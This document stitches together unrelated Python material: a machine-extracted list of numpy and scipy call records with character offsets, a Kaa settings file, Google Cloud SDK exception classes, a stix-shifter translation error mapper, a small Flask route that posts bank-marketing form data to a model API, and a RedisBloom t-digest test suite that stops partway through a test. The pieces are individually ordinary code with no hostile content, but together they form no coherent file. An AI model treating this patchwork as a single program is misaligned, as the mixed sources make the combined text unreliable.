[((731, 751), 'numpy.zeros', 'np.zeros', (['(dim, dim)'], {}), '((dim, dim))\n', (739, 751), True, 'import numpy as np\n'), ((2582, 2595), 'numpy.zeros', 'np.zeros', (['dim'], {}), '(dim)\n', (2590, 2595), True, 'import numpy as np\n'), ((3320, 3333), 'numpy.zeros', 'np.zeros', (['dim'], {}), '(dim)\n', (3328, 3333), True, 'import numpy as np\n'), ((4056, 4077), 'numpy.multiply', 'np.multiply', (['H_2', 'psi'], {}), '(H_2, psi)\n', (4067, 4077), True, 'import numpy as np\n'), ((4088, 4106), 'numpy.vdot', 'np.vdot', (['psi', 'Hpsi'], {}), '(psi, Hpsi)\n', (4095, 4106), True, 'import numpy as np\n'), ((4531, 4550), 'numpy.trace', 'np.trace', (['(H_2 @ rho)'], {}), '(H_2 @ rho)\n', (4539, 4550), True, 'import numpy as np\n'), ((4673, 4692), 'numpy.trace', 'np.trace', (['(H_2 @ rho)'], {}), '(H_2 @ rho)\n', (4681, 4692), True, 'import numpy as np\n'), ((6814, 6849), 'numpy.zeros', 'np.zeros', (['(dim, dim)'], {'dtype': 'complex'}), '((dim, dim), dtype=complex)\n', (6822, 6849), True, 'import numpy as np\n'), ((8301, 8321), 'scipy.sparse.csr_matrix', 'csr_matrix', (['mat_Rabi'], {}), '(mat_Rabi)\n', (8311, 8321), False, 'from scipy.sparse import csr_matrix\n'), ((10582, 10602), 'scipy.sparse.csr_matrix', 'csr_matrix', (['mat_Rabi'], {}), '(mat_Rabi)\n', (10592, 10602), False, 'from scipy.sparse import csr_matrix\n'), ((11501, 11516), 'random.random', 'random.random', ([], {}), '()\n', (11514, 11516), False, 'import random, copy\n'), ((12961, 12981), 'numpy.zeros', 'np.zeros', (['settings.N'], {}), '(settings.N)\n', (12969, 12981), True, 'import numpy as np\n'), ((13180, 13195), 'random.random', 'random.random', ([], {}), '()\n', (13193, 13195), False, 'import random, copy\n'), ((14155, 14177), 'numpy.zeros_like', 'np.zeros_like', (['psi_loc'], {}), '(psi_loc)\n', (14168, 14177), True, 'import numpy as np\n'), ((15322, 15344), 'numpy.zeros_like', 'np.zeros_like', (['psi_loc'], {}), '(psi_loc)\n', (15335, 15344), True, 'import numpy as np\n'), ((17369, 17385), 'numpy.mean', 'np.mean', (['val_tab'], {}), '(val_tab)\n', (17376, 17385), True, 'import numpy as np\n'), ((394, 409), 'numpy.transpose', 'np.transpose', (['M'], {}), '(M)\n', (406, 409), True, 'import numpy as np\n'), ((11988, 12003), 'random.random', 'random.random', ([], {}), '()\n', (12001, 12003), False, 'import random, copy\n'), ((13604, 13627), 'numpy.multiply', 'np.multiply', (['H_loc', 'psi'], {}), '(H_loc, psi)\n', (13615, 13627), True, 'import numpy as np\n'), ((7372, 7398), 'numpy.reshape', 'np.reshape', (['yy', '(dim, dim)'], {}), '(yy, (dim, dim))\n', (7382, 7398), True, 'import numpy as np\n'), ((7614, 7642), 'numpy.reshape', 'np.reshape', (['deriv', '(dim * dim)'], {}), '(deriv, dim * dim)\n', (7624, 7642), True, 'import numpy as np\n'), ((7728, 7754), 'numpy.reshape', 'np.reshape', (['yy', '(dim, dim)'], {}), '(yy, (dim, dim))\n', (7738, 7754), True, 'import numpy as np\n'), ((7979, 8007), 'numpy.reshape', 'np.reshape', (['deriv', '(dim * dim)'], {}), '(deriv, dim * dim)\n', (7989, 8007), True, 'import numpy as np\n'), ((8881, 8896), 'random.random', 'random.random', ([], {}), '()\n', (8894, 8896), False, 'import random, copy\n'), ((12110, 12143), 'numpy.identity', 'np.identity', (['mat_Rabiloc.shape[0]'], {}), '(mat_Rabiloc.shape[0])\n', (12121, 12143), True, 'import numpy as np\n'), ((12408, 12423), 'scipy.sparse.csr_matrix', 'csr_matrix', (['ido'], {}), '(ido)\n', (12418, 12423), False, 'from scipy.sparse import csr_matrix\n'), ((13647, 13672), 'numpy.vdot', 'np.vdot', (['psi', '(1.0j * Hpsi)'], {}), '(psi, 1.0j * Hpsi)\n', (13654, 13672), True, 'import numpy as np\n'), ((13742, 13767), 'numpy.vdot', 'np.vdot', (['psi', '(1.0j * Hpsi)'], {}), '(psi, 1.0j * Hpsi)\n', (13749, 13767), True, 'import numpy as np\n'), ((17038, 17057), 'numpy.linalg.norm', 'np.linalg.norm', (['psi'], {}), '(psi)\n', (17052, 17057), True, 'import numpy as np\n'), ((17341, 17357), 'numpy.mean', 'np.mean', (['val_tab'], {}), '(val_tab)\n', (17348, 17357), True, 'import numpy as np\n'), ((6543, 6568), 'numpy.multiply', 'np.multiply', (['mat_diag', 'yy'], {}), '(mat_diag, yy)\n', (6554, 6568), True, 'import numpy as np\n'), ((10190, 10205), 'random.random', 'random.random', ([], {}), '()\n', (10203, 10205), False, 'import random, copy\n'), ((11357, 11374), 'numpy.linalg.norm', 'np.linalg.norm', (['y'], {}), '(y)\n', (11371, 11374), True, 'import numpy as np\n'), ((12537, 12560), 'numpy.linalg.norm', 'np.linalg.norm', (['psi_new'], {}), '(psi_new)\n', (12551, 12560), True, 'import numpy as np\n'), ((12770, 12793), 'numpy.linalg.norm', 'np.linalg.norm', (['psi_new'], {}), '(psi_new)\n', (12784, 12793), True, 'import numpy as np\n'), ((1518, 1544), 'copy.copy', 'copy.copy', (['basis_vector_ii'], {}), '(basis_vector_ii)\n', (1527, 1544), False, 'import random, copy\n'), ((6662, 6687), 'numpy.multiply', 'np.multiply', (['mat_diag', 'yy'], {}), '(mat_diag, yy)\n', (6673, 6687), True, 'import numpy as np\n'), ((17257, 17272), 'numpy.std', 'np.std', (['val_tab'], {}), '(val_tab)\n', (17263, 17272), True, 'import numpy as np\n'), ((17273, 17290), 'numpy.sqrt', 'np.sqrt', (['(kk + 1.0)'], {}), '(kk + 1.0)\n', (17280, 17290), True, 'import numpy as np\n')]
|
import os
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
"""
Simple settings file for the ins and outs of Kaa.
"""
class KaaSettings:
'Should we try to parallelize the generator calculations?'
Parallelize = True
'''
    The optimization procedure to use in the bundle transformation. Optimization procedures are located in kaa.opts
Takes the strings "Kodiak" or "Bernstein"
'''
OptProd = "Kodiak"
'Suppress Output?'
SuppressOutput = False
'Number of samples to be used for volume estimation'
VolumeSamples = 10000
'Seed for random.seed'
RandSeed = 897987178
'Save the flowpipe when error appears during transformation'
SaveStateonError = True
'Path for data directory to save all xlsx files from experiments.'
DataDir = os.path.join(ROOT_DIR, "data")
'Flag to trigger enveloping box threshold checking'
UseThreshold = False
'Run Normalization method if condition number becomes too large.'
NormalizeLinDir = True
'Evaluate and simplify the polynomial after performing functional composition.'
EvalFinalPoly = False
class DebugSettings:
TimerProfileLabels = set()
class PlotSettings:
    'Font size for the labels on matplotlib plots'
PlotFont = 27
'Toggle to save the figures to disk'
save_fig = True
'Path to save figures'
default_fig_path = os.path.join(ROOT_DIR, "figures")
'Figure dimensions'
fig_size = (60, 60)
NumSteps = 2
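# A minimal usage sketch (added for illustration, not part of Kaa): the
# classes above act as plain namespaces, so settings are read and
# overridden as class attributes.
if __name__ == "__main__":
    print(KaaSettings.DataDir)            # <ROOT_DIR>/data
    KaaSettings.SuppressOutput = True     # runtime override
    print(PlotSettings.default_fig_path)  # <ROOT_DIR>/figures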
|
[
"os.path.abspath",
"os.path.join"
] |
[((37, 62), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (52, 62), False, 'import os\n'), ((796, 826), 'os.path.join', 'os.path.join', (['ROOT_DIR', '"""data"""'], {}), "(ROOT_DIR, 'data')\n", (808, 826), False, 'import os\n'), ((1371, 1404), 'os.path.join', 'os.path.join', (['ROOT_DIR', '"""figures"""'], {}), "(ROOT_DIR, 'figures')\n", (1383, 1404), False, 'import os\n')]
|
# -*- coding: utf-8 -*- #
# Copyright 2014 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base exceptions for the Cloud SDK."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import os
import sys
from googlecloudsdk.core.util import platforms
import six
class _Error(Exception):
"""A base exception for all Cloud SDK errors.
This exception should not be used directly.
"""
pass
class InternalError(_Error):
"""A base class for all non-recoverable internal errors."""
pass
class Error(_Error):
"""A base exception for all user recoverable errors.
Any exception that extends this class will not be printed with a stack trace
  when running from CLI mode. Instead it will be shown with a message of how
the user can correct this problem.
All exceptions of this type must have a message for the user.
"""
def __init__(self, *args, **kwargs):
"""Initialize a core.Error.
Args:
*args: positional args for exceptions.
**kwargs: keyword args for exceptions, and additional arguments:
- exit_code: int, The desired exit code for the CLI.
"""
super(Error, self).__init__(*args)
self.exit_code = kwargs.get('exit_code', 1)
class MultiError(Error):
"""Collection of Error instances as single exception."""
def __init__(self, errors):
super(MultiError, self).__init__(', '.join(str(e) for e in errors))
class RequiresAdminRightsError(Error):
"""An exception for when you don't have permission to modify the SDK.
This tells the user how to run their command with administrator rights so that
they can perform the operation.
"""
def __init__(self, sdk_root):
message = (
'You cannot perform this action because you do not have permission '
'to modify the Google Cloud SDK installation directory [{root}].\n\n'
.format(root=sdk_root))
if (platforms.OperatingSystem.Current() ==
platforms.OperatingSystem.WINDOWS):
message += (
'Click the Google Cloud SDK Shell icon and re-run the command in '
'that window, or re-run the command with elevated privileges by '
'right-clicking cmd.exe and selecting "Run as Administrator".')
else:
# Specify the full path because sudo often uses secure_path and won't
# respect the user's $PATH settings.
gcloud_path = os.path.join(sdk_root, 'bin', 'gcloud')
message += (
'Re-run the command with sudo: sudo {0} ...'.format(gcloud_path))
super(RequiresAdminRightsError, self).__init__(message)
class NetworkIssueError(Error):
"""An error to wrap a general network issue."""
def __init__(self, message):
super(NetworkIssueError, self).__init__(
'{message}\n'
'This may be due to network connectivity issues. Please check your '
'network settings, and the status of the service you are trying to '
'reach.'.format(message=message))
class ExceptionContext(object):
"""An exception context that can be re-raised outside of try-except.
Usage:
exception_context = None
...
try:
...
except ... e:
# This MUST be called in the except: clause.
exception_context = exceptions.ExceptionContext(e)
...
if exception_context:
exception_context.Reraise()
"""
def __init__(self, e):
self._exception = e
self._traceback = sys.exc_info()[2]
if not self._traceback:
raise ValueError('Must set ExceptionContext within an except clause.')
def Reraise(self):
six.reraise(type(self._exception), self._exception, self._traceback)
def reraise(exc_value, tb=None): # pylint: disable=invalid-name
"""Adds tb or the most recent traceback to exc_value and reraises."""
tb = tb or sys.exc_info()[2]
six.reraise(type(exc_value), exc_value, tb)
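# A minimal sketch (added for illustration, not part of the SDK) of the Error
# contract above: a user-recoverable error carrying a custom exit code. The
# class name and exit code are assumptions made for this demo.
if __name__ == '__main__':

  class SampleQuotaError(Error):
    """Hypothetical subclass used only for this demo."""

    def __init__(self):
      super(SampleQuotaError, self).__init__(
          'Quota exceeded; please retry later.', exit_code=3)

  try:
    raise SampleQuotaError()
  except Error as e:
    print(e, e.exit_code)  # Quota exceeded; please retry later. 3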
|
[
"googlecloudsdk.core.util.platforms.OperatingSystem.Current",
"os.path.join",
"sys.exc_info"
] |
[((2459, 2494), 'googlecloudsdk.core.util.platforms.OperatingSystem.Current', 'platforms.OperatingSystem.Current', ([], {}), '()\n', (2492, 2494), False, 'from googlecloudsdk.core.util import platforms\n'), ((2937, 2976), 'os.path.join', 'os.path.join', (['sdk_root', '"""bin"""', '"""gcloud"""'], {}), "(sdk_root, 'bin', 'gcloud')\n", (2949, 2976), False, 'import os\n'), ((3954, 3968), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3966, 3968), False, 'import sys\n'), ((4324, 4338), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (4336, 4338), False, 'import sys\n')]
|
from stix_shifter_utils.utils.error_mapper_base import ErrorMapperBase
from stix_shifter_utils.utils.error_response import ErrorCode
from stix_shifter_utils.stix_translation.src.utils.exceptions import DataMappingException, StixValidationException, \
UnsupportedDataSourceException, TranslationResultException, UnsupportedDialectException, UnsupportedLanguageException
from stix_shifter_utils.stix_translation.src.patterns.errors import SearchFeatureNotSupportedError
from stix_shifter_utils.utils import logger
error_mapping = {
NotImplementedError.__name__: [ErrorCode.TRANSLATION_NOTIMPLEMENTED_MODE, 'wrong parameter'],
DataMappingException.__name__: [ErrorCode.TRANSLATION_MAPPING_ERROR, 'data mapping error'],
StixValidationException.__name__: [ErrorCode.TRANSLATION_STIX_VALIDATION, 'stix validation error'],
SearchFeatureNotSupportedError.__name__: [ErrorCode.TRANSLATION_NOTSUPPORTED, 'search feature is not supported'],
TranslationResultException.__name__: [ErrorCode.TRANSLATION_RESULT, 'result translation error'],
UnsupportedDataSourceException.__name__: [ErrorCode.TRANSLATION_NOTIMPLEMENTED_MODE, 'unsupported datasource'],
UnsupportedDialectException.__name__: [ErrorCode.TRANSLATION_UNKNOWN_DIALOG, 'unknown dialect'],
UnsupportedLanguageException.__name__: [ErrorCode.TRANSLATION_UNKNOWN_LANGUAGE, 'unsupported language']
}
class ErrorMapper():
logger = logger.set_logger(__name__)
DEFAULT_ERROR = ErrorCode.TRANSLATION_MODULE_DEFAULT_ERROR
@staticmethod
def set_error_code(data_dict, return_obj):
exception = None
if 'exception' in data_dict:
exception = data_dict['exception']
error_code = ErrorMapper.DEFAULT_ERROR
error_message = 'Error when converting STIX pattern to data source query'
if exception is not None:
exception_type = type(exception).__name__
ErrorMapper.logger.error("received exception => {}: {}".format(exception_type, exception))
if exception_type in error_mapping:
error_code = error_mapping[exception_type][0]
error_message = error_mapping[exception_type][1]
exception_message = str(exception)
if (len(exception_message) > 0):
if len(error_message) > 0:
error_message += ' : '
error_message += exception_message
ErrorMapperBase.set_error_code(return_obj, error_code, message=error_message)
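# A minimal usage sketch (added for illustration, not part of stix-shifter):
# routing a mapped exception through ErrorMapper. Here return_obj is assumed
# to be a plain dict for ErrorMapperBase.set_error_code to fill in; the real
# translator passes its result object instead.
if __name__ == '__main__':
    return_obj = {}
    try:
        raise NotImplementedError('unsupported option')
    except NotImplementedError as ex:
        ErrorMapper.set_error_code({'exception': ex}, return_obj)
    print(return_obj)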
|
[
"stix_shifter_utils.utils.error_mapper_base.ErrorMapperBase.set_error_code",
"stix_shifter_utils.utils.logger.set_logger"
] |
[((1415, 1442), 'stix_shifter_utils.utils.logger.set_logger', 'logger.set_logger', (['__name__'], {}), '(__name__)\n', (1432, 1442), False, 'from stix_shifter_utils.utils import logger\n'), ((2436, 2513), 'stix_shifter_utils.utils.error_mapper_base.ErrorMapperBase.set_error_code', 'ErrorMapperBase.set_error_code', (['return_obj', 'error_code'], {'message': 'error_message'}), '(return_obj, error_code, message=error_message)\n', (2466, 2513), False, 'from stix_shifter_utils.utils.error_mapper_base import ErrorMapperBase\n')]
|
from application import app
from flask import render_template, request, json, jsonify
from sklearn import preprocessing
from sklearn.preprocessing import OneHotEncoder
import requests
import numpy
import pandas as pd
#route decorators for the home page
@app.route("/")
@app.route("/index")
def index():
return render_template("index.html")
#route decorator for the classification service
@app.route("/bankclassify", methods=['GET', 'POST'])
def bankclassify():
#extract form inputs
age = request.form.get("age")
job = request.form.get("job")
marital = request.form.get("marital")
education = request.form.get("education")
default = request.form.get("default")
balance = request.form.get("balance")
housing = request.form.get("housing")
loan = request.form.get("loan")
#convert data to json
input_data = json.dumps({"age": age, "job": job, "marital": marital, "education": education, "default": default, "balance": balance, "housing": housing, "loan": loan})
#url for bank marketing model
url = "http://localhost:5000/api"
#url = "https://bank-model-app.herokuapp.com/api"
#post data to url
results = requests.post(url, input_data)
#send input values and prediction result to index.html for display
return render_template("index.html", age = age, job = job, marital = marital, education = education, default = default, balance = balance, housing = housing, loan = loan, results=results.content.decode('UTF-8'))
|
[
"flask.request.form.get",
"flask.json.dumps",
"flask.render_template",
"application.app.route",
"requests.post"
] |
[((248, 262), 'application.app.route', 'app.route', (['"""/"""'], {}), "('/')\n", (257, 262), False, 'from application import app\n'), ((264, 283), 'application.app.route', 'app.route', (['"""/index"""'], {}), "('/index')\n", (273, 283), False, 'from application import app\n'), ((373, 424), 'application.app.route', 'app.route', (['"""/bankclassify"""'], {'methods': "['GET', 'POST']"}), "('/bankclassify', methods=['GET', 'POST'])\n", (382, 424), False, 'from application import app\n'), ((308, 337), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (323, 337), False, 'from flask import render_template, request, json, jsonify\n'), ((481, 504), 'flask.request.form.get', 'request.form.get', (['"""age"""'], {}), "('age')\n", (497, 504), False, 'from flask import render_template, request, json, jsonify\n'), ((515, 538), 'flask.request.form.get', 'request.form.get', (['"""job"""'], {}), "('job')\n", (531, 538), False, 'from flask import render_template, request, json, jsonify\n'), ((553, 580), 'flask.request.form.get', 'request.form.get', (['"""marital"""'], {}), "('marital')\n", (569, 580), False, 'from flask import render_template, request, json, jsonify\n'), ((597, 626), 'flask.request.form.get', 'request.form.get', (['"""education"""'], {}), "('education')\n", (613, 626), False, 'from flask import render_template, request, json, jsonify\n'), ((641, 668), 'flask.request.form.get', 'request.form.get', (['"""default"""'], {}), "('default')\n", (657, 668), False, 'from flask import render_template, request, json, jsonify\n'), ((683, 710), 'flask.request.form.get', 'request.form.get', (['"""balance"""'], {}), "('balance')\n", (699, 710), False, 'from flask import render_template, request, json, jsonify\n'), ((725, 752), 'flask.request.form.get', 'request.form.get', (['"""housing"""'], {}), "('housing')\n", (741, 752), False, 'from flask import render_template, request, json, jsonify\n'), ((764, 788), 'flask.request.form.get', 'request.form.get', (['"""loan"""'], {}), "('loan')\n", (780, 788), False, 'from flask import render_template, request, json, jsonify\n'), ((832, 994), 'flask.json.dumps', 'json.dumps', (["{'age': age, 'job': job, 'marital': marital, 'education': education,\n 'default': default, 'balance': balance, 'housing': housing, 'loan': loan}"], {}), "({'age': age, 'job': job, 'marital': marital, 'education':\n education, 'default': default, 'balance': balance, 'housing': housing,\n 'loan': loan})\n", (842, 994), False, 'from flask import render_template, request, json, jsonify\n'), ((1154, 1184), 'requests.post', 'requests.post', (['url', 'input_data'], {}), '(url, input_data)\n', (1167, 1184), False, 'import requests\n')]
|
#!/usr/bin/env python3
import os
from random import randint
from RLTest import Env
from redis import ResponseError
import redis
import sys
import random
import math
is_valgrind = "VGD" in os.environ or "VALGRIND" in os.environ
def parse_tdigest_info(array_reply):
reply_dict = {}
for pos in range(0, len(array_reply), 2):
property_name = array_reply[pos]
property_value = array_reply[pos + 1]
reply_dict[property_name] = property_value
return reply_dict
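# Worked example (added for clarity): TDIGEST.INFO replies arrive as a flat
# [name, value, name, value, ...] array, which the helper above folds into
# a dict:
#   parse_tdigest_info(["Compression", 100, "Merged weight", "42"])
#   -> {"Compression": 100, "Merged weight": "42"}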
class testTDigest:
def __init__(self):
self.env = Env(decodeResponses=True)
self.assertOk = self.env.assertTrue
self.cmd = self.env.cmd
self.assertEqual = self.env.assertEqual
self.assertRaises = self.env.assertRaises
self.assertTrue = self.env.assertTrue
self.assertAlmostEqual = self.env.assertAlmostEqual
self.assertGreater = self.env.assertGreater
self.assertAlmostEqual = self.env.assertAlmostEqual
self.restart_and_reload = self.env.restartAndReload
def test_tdigest_create(self):
for compression in range(100, 1000, 100):
self.assertOk(self.cmd("tdigest.create", "tdigest", compression))
self.assertEqual(
compression,
parse_tdigest_info(self.cmd("tdigest.info", "tdigest"))["Compression"],
)
def test_negative_tdigest_create(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.create", "tdigest", 100
)
self.cmd("DEL", "tdigest")
# arity lower
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.create", "tdigest"
)
# arity upper
self.assertRaises(
redis.exceptions.ResponseError,
self.cmd,
"tdigest.create",
"tdigest",
100,
5,
)
# parsing
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.create", "tdigest", "a"
)
# compression negative/zero value
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.create", "tdigest", 0
)
# compression negative/zero value
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.create", "tdigest", -1
)
def test_tdigest_reset(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# reset on empty histogram
self.assertOk(self.cmd("tdigest.reset", "tdigest"))
# insert datapoints into sketch
for x in range(100):
self.assertOk(self.cmd("tdigest.add", "tdigest", random.random(), 1.0))
# assert we have 100 unmerged nodes
self.assertEqual(
100,
parse_tdigest_info(self.cmd("tdigest.info", "tdigest"))["Unmerged nodes"],
)
self.assertOk(self.cmd("tdigest.reset", "tdigest"))
        # assert the reset left no unmerged nodes
self.assertEqual(
0, parse_tdigest_info(self.cmd("tdigest.info", "tdigest"))["Unmerged nodes"]
)
def test_negative_tdigest_reset(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.reset", "tdigest"
)
self.cmd("DEL", "tdigest")
# empty key
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.reset", "tdigest"
)
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.reset")
# arity upper
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.reset", "tdigest", 100
)
def test_tdigest_add(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# reset on empty histogram
self.assertOk(self.cmd("tdigest.reset", "tdigest"))
# insert datapoints into sketch
for x in range(10000):
self.assertOk(
self.cmd(
"tdigest.add",
"tdigest",
random.random() * 10000,
random.random() * 500 + 1.0,
)
)
def test_negative_tdigest_add(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.add", "tdigest", 100, 100
)
self.cmd("DEL", "tdigest")
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.add", "tdigest"
)
# arity upper
self.assertRaises(
ResponseError, self.cmd, "tdigest.add", "tdigest", 100, 5, 100.0
)
# key does not exist
self.assertRaises(
ResponseError, self.cmd, "tdigest.add", "dont-exist", 100, 100
)
# parsing
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.add", "tdigest", "a", 5
)
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.add", "tdigest", 5.0, "a"
)
def test_tdigest_merge(self):
self.assertOk(self.cmd("tdigest.create", "to-tdigest", 100))
self.assertOk(self.cmd("tdigest.create", "from-tdigest", 100))
# insert datapoints into sketch
for _ in range(100):
self.assertOk(self.cmd("tdigest.add", "from-tdigest", 1.0, 1.0))
for _ in range(100):
self.assertOk(self.cmd("tdigest.add", "to-tdigest", 1.0, 10.0))
# merge from-tdigest into to-tdigest
self.assertOk(self.cmd("tdigest.merge", "to-tdigest", "from-tdigest"))
# we should now have 1100 weight on to-histogram
to_info = parse_tdigest_info(self.cmd("tdigest.info", "to-tdigest"))
total_weight_to = float(to_info["Merged weight"]) + float(
to_info["Unmerged weight"]
)
self.assertEqual(1100, total_weight_to)
def test_tdigest_merge_to_empty(self):
self.assertOk(self.cmd("tdigest.create", "to-tdigest", 100))
self.assertOk(self.cmd("tdigest.create", "from-tdigest", 100))
# insert datapoints into sketch
for _ in range(100):
self.assertOk(self.cmd("tdigest.add", "from-tdigest", 1.0, 1.0))
# merge from-tdigest into to-tdigest
self.assertOk(self.cmd("tdigest.merge", "to-tdigest", "from-tdigest"))
# assert we have same merged weight on both histograms ( given the to-histogram was empty )
from_info = parse_tdigest_info(self.cmd("tdigest.info", "from-tdigest"))
total_weight_from = float(from_info["Merged weight"]) + float(
from_info["Unmerged weight"]
)
to_info = parse_tdigest_info(self.cmd("tdigest.info", "to-tdigest"))
total_weight_to = float(to_info["Merged weight"]) + float(
to_info["Unmerged weight"]
)
self.assertEqual(total_weight_from, total_weight_to)
def test_negative_tdigest_merge(self):
self.cmd("SET", "to-tdigest", "B")
self.cmd("SET", "from-tdigest", "B")
# WRONGTYPE
self.assertRaises(
ResponseError, self.cmd, "tdigest.merge", "to-tdigest", "from-tdigest"
)
self.cmd("DEL", "to-tdigest")
self.assertOk(self.cmd("tdigest.create", "to-tdigest", 100))
self.assertRaises(
ResponseError, self.cmd, "tdigest.merge", "to-tdigest", "from-tdigest"
)
self.cmd("DEL", "from-tdigest")
self.assertOk(self.cmd("tdigest.create", "from-tdigest", 100))
# arity lower
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.merge", "to-tdigest"
)
# arity upper
self.assertRaises(
ResponseError,
self.cmd,
"tdigest.merge",
"to-tdigest",
"from-tdigest",
"from-tdigest",
)
# key does not exist
self.assertRaises(
ResponseError, self.cmd, "tdigest.merge", "dont-exist", "to-tdigest"
)
self.assertRaises(
ResponseError, self.cmd, "tdigest.merge", "to-tdigest", "dont-exist"
)
def test_tdigest_min_max(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# test for no datapoints first
self.assertEqual(sys.float_info.max, float(self.cmd("tdigest.min", "tdigest")))
self.assertEqual(sys.float_info.min, float(self.cmd("tdigest.max", "tdigest")))
# insert datapoints into sketch
for x in range(1, 101):
self.assertOk(self.cmd("tdigest.add", "tdigest", x, 1.0))
# min/max
self.assertEqual(100, float(self.cmd("tdigest.max", "tdigest")))
self.assertEqual(1, float(self.cmd("tdigest.min", "tdigest")))
def test_negative_tdigest_min_max(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.min", "tdigest"
)
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.max", "tdigest"
)
# key does not exist
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.min", "dont-exist"
)
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.max", "dont-exist"
)
self.cmd("DEL", "tdigest", "B")
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.min")
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.max")
# arity upper
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.min", "tdigest", 1
)
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.max", "tdigest", 1
)
def test_tdigest_quantile(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 500))
# insert datapoints into sketch
for x in range(1, 10000):
self.assertOk(self.cmd("tdigest.add", "tdigest", x * 0.01, 1.0))
        # assert min/max give the same result as quantile 0 and 1
self.assertEqual(
float(self.cmd("tdigest.max", "tdigest")),
float(self.cmd("tdigest.quantile", "tdigest", 1.0)),
)
self.assertEqual(
float(self.cmd("tdigest.min", "tdigest")),
float(self.cmd("tdigest.quantile", "tdigest", 0.0)),
)
self.assertAlmostEqual(
1.0, float(self.cmd("tdigest.quantile", "tdigest", 0.01)), 0.01
)
self.assertAlmostEqual(
99.0, float(self.cmd("tdigest.quantile", "tdigest", 0.99)), 0.01
)
def test_negative_tdigest_quantile(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.quantile", "tdigest", 0.9
)
# key does not exist
self.assertRaises(
ResponseError, self.cmd, "tdigest.quantile", "dont-exist", 0.9
)
self.cmd("DEL", "tdigest", "B")
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.quantile")
# arity upper
self.assertRaises(
redis.exceptions.ResponseError,
self.cmd,
"tdigest.quantile",
"tdigest",
1,
1,
)
# parsing
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.quantile", "tdigest", "a"
)
def test_tdigest_cdf(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 500))
# insert datapoints into sketch
for x in range(1, 100):
self.assertOk(self.cmd("tdigest.add", "tdigest", x, 1.0))
self.assertAlmostEqual(
0.01, float(self.cmd("tdigest.cdf", "tdigest", 1.0)), 0.01
)
self.assertAlmostEqual(
0.99, float(self.cmd("tdigest.cdf", "tdigest", 99.0)), 0.01
)
def test_negative_tdigest_cdf(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.cdf", "tdigest", 0.9
)
# key does not exist
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.cdf", "dont-exist", 0.9
)
self.cmd("DEL", "tdigest", "B")
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.cdf")
# arity upper
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.cdf", "tdigest", 1, 1
)
# parsing
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.cdf", "tdigest", "a"
)
def test_negative_tdigest_info(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.info", "tdigest"
)
# dont exist
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.info", "dont-exist"
)
self.cmd("DEL", "tdigest", "B")
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.info")
# arity upper
self.assertRaises(
